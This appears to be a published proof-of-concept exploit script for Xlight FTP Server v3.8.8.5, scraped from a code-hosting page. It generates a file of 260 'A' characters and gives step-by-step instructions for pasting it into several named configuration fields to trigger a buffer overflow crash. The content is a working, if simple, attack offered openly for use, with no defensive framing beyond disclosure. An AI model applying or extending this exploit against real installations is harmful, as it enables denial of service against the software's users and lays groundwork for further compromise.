38 lines
No EOL
1.2 KiB
Python
Executable file
38 lines
No EOL
1.2 KiB
Python
Executable file
#!/usr/bin/python
|
|
#
|
|
# Exploit Author: bzyo
|
|
# Twitter: @bzyo_
|
|
# Exploit Title: Xlight FTP Server (x86/x64) - Buffer Overflow Crash (PoC)
|
|
# Date: 07-11-2017
|
|
# Vulnerable Software: Xlight FTP Server v3.8.8.5 (x86/x64)
|
|
# Vendor Homepage: http://www.xlightftpd.com/
|
|
# Version: v3.8.8.5 (x86/x64)
|
|
# Software Link: http://www.xlightftpd.com/download/
|
|
# Tested On: Windows 7 x64
|
|
#
|
|
#
|
|
# PoC: generate crash.txt, copy contents to clipboard, paste in any of the vulnerable fields
|
|
#
|
|
# 1. Generate crash.txt, open, and copy contents to clipboard
|
|
# 2. In Xlight Server, open Global Options > Log > Session Log - Advanced Options > Setup
|
|
# 3. Select Filtering log by users > Setup
|
|
# 4. Add User
|
|
# 5. Paste crash.txt contents
|
|
# 6. Application crashes
|
|
#
|
|
# Additional vulnerable fields:
|
|
# Global Options > Log > Session Log - Advanced Options > Setup > Filtering log by groups > Setup > Add Group
|
|
# Virtual Server > Modify Virtual Server Configuration > Advanced > Misc > Execute a program after user logged in > Setup
|
|
#
|
|
#
|
|
|
|
file="crash.txt"
|
|
#file="crash64.txt"
|
|
|
|
crash = "A"*260 #crashes on 260 for x86, but more will do
|
|
#crash64 = "A"*272 #crashes on 272 for x64, but more will do
|
|
|
|
writeFile = open (file, "w")
|
|
writeFile.write( crash )
|
|
#writeFile.write( crash64 )
|
|
writeFile.close() |